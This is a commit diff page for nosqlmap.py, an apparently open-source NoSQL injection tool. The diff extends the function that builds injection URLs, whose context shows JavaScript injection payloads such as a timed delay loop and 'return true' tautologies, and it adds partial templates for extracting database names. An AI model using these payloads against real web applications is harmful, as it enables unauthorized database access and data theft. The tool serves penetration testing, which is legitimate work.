Skip to content

Commit 933bf94

Browse files
tcstooltcstool
committed
More work on DB access via web app
1 parent 56b02fe commit 933bf94

File tree

1 file changed

+14
-2
lines changed

1 file changed

+14
-2
lines changed

nosqlmap.py

Lines changed: 14 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -703,7 +703,8 @@ def webDBAttacks(trueLen):
703703

704704
if getDBName == "y" or getDBName == "Y":
705705
while injTestLen != trueLen:
706-
tempUri =
706+
testUri = uriArray[16].split("---")
707+
707708

708709

709710
def randInjString(size):
@@ -742,7 +743,7 @@ def buildUri(origUri, randValue):
742743
paramName = []
743744
paramValue = []
744745
global uriArray
745-
uriArray = ["","","","","","","","","","","","","","","",""]
746+
uriArray = ["","","","","","","","","","","","","","","","",""]
746747
injOpt = ""
747748

748749
#Split the string between the path and parameters, and then split each parameter
@@ -791,6 +792,10 @@ def buildUri(origUri, randValue):
791792
uriArray[11] = split_uri[0] + "?"
792793
uriArray[12] = split_uri[0] + "?"
793794
uriArray[13] = split_uri[0] + "?"
795+
uriArray[14] = split_uri[0] + "?"
796+
uriArray[15] = split_uri[0] + "?"
797+
uriArray[16] = split_uri[0] + "?"
798+
uriArray[17] = split_uri[0] + "?"
794799

795800
for item in paramName:
796801
if paramName[x] == injOpt:
@@ -810,6 +815,9 @@ def buildUri(origUri, randValue):
810815
uriArray[13] += paramName[x] + "=a\"; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=\"!" + "&"
811816
uriArray[14] += paramName[x] + "a'; return true; var dum=a'"
812817
uriArray[15] += paramName[x] + "1; return true; var dum=2"
818+
#Add values that can be manipulated for database attacks
819+
uriArray[16] += paramName[x] + "=a'; if ---"
820+
uriArray[17] += paramName[x] + "=1; if ---"
813821

814822
else:
815823
uriArray[0] += paramName[x] + "=" + paramValue[x] + "&"
@@ -828,6 +836,8 @@ def buildUri(origUri, randValue):
828836
uriArray[13] += paramName[x] + "=" + paramValue[x] + "&"
829837
uriArray[14] += paramName[x] + "=" + paramValue[x] + "&"
830838
uriArray[15] += paramName[x] + "=" + paramValue[x] + "&"
839+
uriArray[16] += paramName[x] + "=" + paramValue[x] + "&"
840+
uriArray[17] += paramName[x] + "=" + paramValue[x] + "&"
831841
x += 1
832842

833843
#Clip the extra & off the end of the URL
@@ -847,6 +857,8 @@ def buildUri(origUri, randValue):
847857
uriArray[13] = uriArray[13][:-1]
848858
uriArray[14] = uriArray[14][:-1]
849859
uriArray[15] = uriArray[15][:-1]
860+
uriArray[16] = uriArray[16][:-1]
861+
uriArray[17] = uriArray[17][:-1]
850862
return uriArray[0]
851863

852864
def stealDBs(myDB):

0 commit comments

Comments
 (0)